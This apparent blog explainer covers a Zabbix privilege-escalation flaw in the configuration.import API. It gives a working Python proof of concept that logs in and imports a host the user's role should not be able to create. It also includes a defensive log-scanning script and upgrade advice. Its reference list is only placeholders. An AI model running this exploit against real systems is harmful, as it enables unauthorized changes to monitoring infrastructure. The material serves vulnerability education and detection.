Zabbix has long been a trusted monitoring solution for companies worldwide. Its detailed configuration management and robust role-based access control (RBAC) help keep things secure… most of the time. But in early 2026, a new vulnerability—CVE-2026-23925—dropped, showing just how some seemingly harmless permissions can become dangerous.

In this article, I'll explain the issue in plain English. We'll walk through how it works, why it matters, and give you code snippets and references so you can understand and test the issue safely. All info is for educational purposes!

What Is CVE-2026-23925?

CVE-2026-23925 is a vulnerability in Zabbix (up to certain versions). If a user has the User role and write permissions to template/host objects, they shouldn’t normally be able to create new hosts or templates. But due to a logic flaw in the configuration.import API, they *can*—meaning they can import unauthorized hosts via the API and potentially expose sensitive information monitored by Zabbix.

- Affected Software: Zabbix (specific versions, check references)
- Vulnerability Type: Broken access control / privilege escalation via API
- Permissions Required: Authenticated user with User role and write access to templates/hosts

Why Is This a Problem?

Normally, Zabbix splits users into roles with strict boundaries. A regular "User" can't just make new hosts or templates. Even if you give a user write permissions to templates/hosts, that’s supposed to let them *edit* objects, not *create* them.

But with this bug, a user can send a JSON request to the configuration.import API endpoint, and upload their own templates, hosts, or items—essentially bypassing the expected permission scheme.

Exploiting The Vulnerability

> Warning: Only perform this in a lab you own! Do not attack systems you do not have permission to test.

Step 1: Get Auth Token

import requests

url = "https://your-zabbix.example.com/api_jsonrpc.php"

# Log in to the Zabbix API ("auth" must be null for user.login).
# Zabbix 5.4 and later document this parameter as "username"; "user" is the older, deprecated name.
payload = {
    "jsonrpc": "2.0",
    "method": "user.login",
    "params": {
        "user": "testuser",
        "password": "userpassword"
    },
    "id": 1,
    "auth": None
}

response = requests.post(url, json=payload)
result = response.json()
if "error" in result:
    raise SystemExit(f"login failed: {result['error']}")
auth_token = result["result"]

Step 2: Craft The Import File

To create a new host, craft a simple XML or YAML Zabbix export. Here's a minimal XML for a host:

<zabbix_export>
  <version>6.0</version>
  <hosts>
    <host>
      <host>malicious-host</host>
      <name>Malicious Host</name>
      <interfaces>
        <interface>
          <type>1</type>
          <main>1</main>
          <useip>1</useip>
          <ip>1.2.3.4</ip>
          <dns/>
          <port>10050</port>
        </interface>
      </interfaces>
      <groups>
        <group>
          <name>Linux servers</name>
        </group>
      </groups>
    </host>
  </hosts>
</zabbix_export>

Step 3: Send The Import Request

# Read the XML export prepared in Step 2. It is sent as a plain string in "source";
# no base64 encoding is needed. `requests`, `url` and `auth_token` come from Step 1.
with open('malicious_host.xml', 'r') as file:
    xml_data = file.read()

import_payload = {
    "jsonrpc": "2.0",
    "method": "configuration.import",
    "params": {
        "format": "xml",
        "rules": {
            "hosts": {
                "createMissing": True,   # the create flag the role check should have blocked
                "updateExisting": True
            }
        },
        "source": xml_data
    },
    "auth": auth_token,
    "id": 2
}

resp = requests.post(url, json=import_payload)
print(resp.text)

If successful, you just created a new host—even though your role shouldn’t normally allow it.

Why Does This Happen?

Zabbix doesn’t thoroughly check the requester’s *role* in configuration.import. It checks write permissions, but not whether the role should be allowed to *create* (as opposed to just edit). That means anyone with "write" can sneak in new objects by importing them.
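Until the upgrade is in place, the one thing an admin can watch for is exactly this pattern: a configuration.import call whose rules set createMissing, coming from an account that should only be editing. The script below is an added example, not part of the original post or of Zabbix; it assumes a hypothetical reverse proxy in front of api_jsonrpc.php that logs one JSON record per request with the calling user and the request body (the record shape and the `user` field are assumptions), and flags creating imports from accounts outside an allowlist.

```python
import json

# Constructed sample records (hypothetical proxy log, not a Zabbix feature):
# one JSON object per line with the session user and the JSON-RPC body.
SAMPLE_LOG = """\
{"user": "admin", "body": {"jsonrpc": "2.0", "method": "configuration.import", "params": {"format": "xml", "rules": {"hosts": {"createMissing": true}}, "source": "..."}, "id": 1}}
{"user": "testuser", "body": {"jsonrpc": "2.0", "method": "configuration.import", "params": {"format": "xml", "rules": {"hosts": {"createMissing": false, "updateExisting": true}}, "source": "..."}, "id": 2}}
{"user": "testuser", "body": {"jsonrpc": "2.0", "method": "configuration.import", "params": {"format": "xml", "rules": {"hosts": {"createMissing": true, "updateExisting": true}}, "source": "..."}, "id": 3}}
{"user": "testuser", "body": {"jsonrpc": "2.0", "method": "host.get", "params": {}, "id": 4}}
{"user": "testuser", "body": {"jsonrpc": "2.0", "method": "configuration.import", "params": {"format": "yaml", "rules": {"templates": {"createMissing": true}, "hosts": {"updateExisting": true}}, "source": "..."}, "id": 5}}
"""

# Accounts whose role legitimately allows creating hosts/templates (assumed allowlist).
PRIVILEGED_USERS = {"admin"}


def creating_rules(rules):
    """Return the import rule sections (hosts, templates, ...) that request object creation."""
    return sorted(name for name, opts in rules.items()
                  if isinstance(opts, dict) and opts.get("createMissing") is True)


def find_suspicious_imports(log_text, privileged=PRIVILEGED_USERS):
    """Return (user, creating sections, request id) for configuration.import calls
    that would create objects on behalf of a non-privileged account.
    Imports that only set updateExisting are the intended 'write' use and are not flagged."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = json.loads(line)
        body = entry.get("body", {})
        if body.get("method") != "configuration.import":
            continue
        sections = creating_rules(body.get("params", {}).get("rules", {}))
        if sections and entry.get("user") not in privileged:
            hits.append((entry.get("user"), sections, body.get("id")))
    return hits


if __name__ == "__main__":
    for user, sections, req_id in find_suspicious_imports(SAMPLE_LOG):
        print(f"request {req_id}: {user} imported with createMissing on {sections}")
```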

Recommendations for Admins

1. Upgrade Zabbix to a fixed version. Always keep up-to-date. Watch Zabbix Security Advisories and CVE listing sites.

Official References

- Zabbix Issue Tracker (replace with actual link when available)
- CVE official entry (MITRE)
- Zabbix API Documentation

Summary

CVE-2026-23925 is a classic example of how misunderstanding permissions—even if narrowly defined—can create a way in for attackers. By abusing the configuration.import method, users with only write permission (not create) to templates/hosts can slip in their own creations.

Keep your systems updated, limit permissions, and always double-check what each API can really do with the permissions you assign!
Stay safe! If you’re using Zabbix, check your versions and your user roles—this is a good time for a security review.

Timeline

Published on: 03/06/2026 08:24:15 UTC
Last modified on: 03/09/2026 13:35:34 UTC